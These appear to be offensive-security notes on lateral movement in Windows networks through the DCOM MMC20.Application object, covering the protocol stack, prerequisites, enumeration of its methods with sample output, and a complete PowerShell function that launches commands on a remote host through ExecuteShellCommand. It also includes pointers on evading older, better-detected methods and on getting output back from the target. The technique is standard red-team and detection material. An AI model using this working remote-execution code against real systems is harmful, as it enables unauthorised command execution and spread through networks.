- Set of Microsoft concepts and program interfaces for communication between software components
- A client object can request services from a server object on another machine
- Works across the network using RPC over TCP/IP
- Extends COM, which only runs on the local machine; it does not replace OLE (OLE is itself built on top of COM)
Protocol Stack
- Higher-level application (e.g. PowerShell instantiating a COM object)
- DCOM (ORPC: object references, OXIDs and marshalling on top of RPC)
- RPC (MS-RPC; the endpoint mapper on TCP/135, then a dynamic high port for the process that hosts the object)
Protocol Overview
- The client requests a remote object (activation) through a higher-level application; the request leaves as an ORPC call over RPC
- The server side handles it with the OXID resolver (rpcss on TCP/135), which resolves the object's OXID to the binding of the object exporter, the process that actually hosts the object and services the calls
Why DCOM?
- The older lateral movement methods (psexec, schtasks, winrm) are well known and easy for defenders to spot (service creation, scheduled task creation, WinRM logons)
- DCOM needs no service or task on the target, but it is not invisible: the COM server (mmc.exe for MMC20.Application) is started by the DcomLaunch service on the target, and the command you run shows up as a child process of mmc.exe, which a parent/child process rule can catch
Prerequisite
- You need administrative rights on the target: by default only members of the local Administrators group hold the DCOM remote launch/activation permissions. Domain admin satisfies this on every domain-joined host; if you don't have it, get it first, because this is lateral movement, not privilege escalation
- The target firewall must allow TCP/135 and the RPC dynamic port range, otherwise activation fails
MMC20.Application
- COM object exposed by the Microsoft Management Console (mmc.exe); it allows scripting MMC snap-in operations, and its View object exposes ExecuteShellCommand
Enumerating methods of MMC20.Application
```powershell
$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","192.168.x.x"))
$com.Document.ActiveView | Get-Member
```
```powershell
PS C:\WINDOWS\system32> $com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","192.168.1.206"))
PS C:\WINDOWS\system32> $com.Document.ActiveView | Get-Member

   TypeName: System.__ComObject#{6efc2da2-b38c-457e-9abb-ed2d189b8c38}

Name                          MemberType            Definition
----                          ----------            ----------
Back                          Method                void Back ()
Close                         Method                void Close ()
CopyScopeNode                 Method                void CopyScopeNode (Variant)
CopySelection                 Method                void CopySelection ()
DeleteScopeNode               Method                void DeleteScopeNode (Variant)
DeleteSelection               Method                void DeleteSelection ()
Deselect                      Method                void Deselect (Node)
DisplayScopeNodePropertySheet Method                void DisplayScopeNodePropertySheet (Variant)
DisplaySelectionPropertySheet Method                void DisplaySelectionPropertySheet ()
ExecuteScopeNodeMenuItem      Method                void ExecuteScopeNodeMenuItem (string, Variant)
ExecuteSelectionMenuItem      Method                void ExecuteSelectionMenuItem (string)
ExecuteShellCommand           Method                void ExecuteShellCommand (string, string, string, string)
ExportList                    Method                void ExportList (string, ExportListOptions)
Forward                       Method                void Forward ()
Is                            Method                bool Is (View)
IsSelected                    Method                int IsSelected (Node)
RefreshScopeNode              Method                void RefreshScopeNode (Variant)
RefreshSelection              Method                void RefreshSelection ()
RenameScopeNode               Method                void RenameScopeNode (string, Variant)
RenameSelectedItem            Method                void RenameSelectedItem (string)
Select                        Method                void Select (Node)
SelectAll                     Method                void SelectAll ()
SnapinScopeObject             Method                IDispatch SnapinScopeObject (Variant)
SnapinSelectionObject         Method                IDispatch SnapinSelectionObject ()
ViewMemento                   Method                void ViewMemento (string)
CellContents                  ParameterizedProperty string CellContents (Node, int) {get}
ScopeNodeContextMenu          ParameterizedProperty ContextMenu ScopeNodeContextMenu (Variant) {get}
ActiveScopeNode               Property              Node ActiveScopeNode () {get} {set}
Columns                       Property              Columns Columns () {get}
ControlObject                 Property              IDispatch ControlObject () {get}
Document                      Property              Document Document () {get}
Frame                         Property              Frame Frame () {get}
ListItems                     Property              Nodes ListItems () {get}
ListViewMode                  Property              ListViewMode ListViewMode () {get} {set}
Memento                       Property              string Memento () {get}
ScopeTreeVisible              Property              int ScopeTreeVisible () {get} {set}
Selection                     Property              Nodes Selection () {get}
SelectionContextMenu          Property              ContextMenu SelectionContextMenu () {get}
StatusBarText                 Property              string StatusBarText () {set}
```
The method to call for command execution is ExecuteShellCommand (Command, Directory, Parameters, WindowState); it starts the given program on the machine that hosts the COM object, i.e. on the remote target, under the caller's identity.
- It can be invoked over the network, but the caller needs admin rights on the remote computer; without them activation fails with access denied (0x80070005).
- For example, from a client machine with domain admin privileges you can execute commands on a domain controller.
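As an added example (not code from the original notes or from the enigma0x3 posts), here is the whole procedure wrapped in a function with the checks the notes above imply: reachability of the RPC endpoint mapper, a resolvable ProgID, and missing admin rights on the target surfacing as an access-denied error. The function name Invoke-MMC20Exec, the target 192.168.1.206 and the output path are assumptions for illustration:

```powershell
# Added example; not code from the original notes or from the referenced posts.
# Assumptions: the function name, the target address and the output path are hypothetical;
# the caller must be a local administrator on the target, and TCP/135 plus the RPC
# dynamic port range must be reachable. Test-NetConnection needs Windows 8 / 2012 or later.
function Invoke-MMC20Exec {
    param(
        [Parameter(Mandatory)] [string] $ComputerName,
        [Parameter(Mandatory)] [string] $Command,
        [string] $Arguments        = $null,
        [string] $WorkingDirectory = $null
    )

    # DCOM activation starts with the endpoint mapper; fail fast if it is filtered
    if (-not (Test-NetConnection -ComputerName $ComputerName -Port 135 -InformationLevel Quiet)) {
        Write-Warning "TCP/135 on $ComputerName is not reachable; DCOM activation would fail"
        return $false
    }

    $com = $null
    try {
        # Remote activation: the DcomLaunch service on the target starts mmc.exe under the
        # caller's identity and returns a proxy to the MMC Application object.
        # GetTypeFromProgID returns $null (it does not throw) when the ProgID is unknown.
        $type = [Type]::GetTypeFromProgID("MMC20.Application", $ComputerName)
        if ($null -eq $type) {
            Write-Warning "ProgID MMC20.Application could not be resolved on $ComputerName"
            return $false
        }
        $com = [Activator]::CreateInstance($type)

        # View.ExecuteShellCommand(Command, Directory, Parameters, WindowState).
        # "7" is the WindowState value used in the referenced enigma0x3 post; the
        # documented string values are "Restored", "Minimized" and "Maximized".
        # The program starts on the target as a child process of mmc.exe.
        $com.Document.ActiveView.ExecuteShellCommand($Command, $WorkingDirectory, $Arguments, "7")
        return $true
    }
    catch {
        # 0x80070005 (E_ACCESSDENIED) here means the caller lacks DCOM launch/activation
        # rights on the target, i.e. is not a local admin there
        Write-Warning "DCOM call to $ComputerName failed: $($_.Exception.Message)"
        return $false
    }
    finally {
        if ($null -ne $com) {
            # Close the remote MMC window so mmc.exe does not linger on the target;
            # the process launched through ExecuteShellCommand is independent and keeps running
            try { $com.Quit() } catch { }
            [void][Runtime.InteropServices.Marshal]::ReleaseComObject($com)
        }
    }
}

# Usage: run whoami on the target and drop the result into a file there
Invoke-MMC20Exec -ComputerName "192.168.1.206" -Command "cmd.exe" `
    -Arguments "/c whoami > C:\Windows\Temp\dcom.txt"
```

The function returns $true only when the remote call went through; the output file is written on the target, not on the attacking host, so retrieve it over SMB or run something that calls back instead. The same pattern works for any other DCOM object that exposes a method which launches a process; only the ProgID and the method call change.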
Ref
- https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/
- https://technet.microsoft.com/en-us/library/cc181199.aspx?f=255&MSPPError=-2147217396
- https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/ (original post describing the MMC20.Application technique)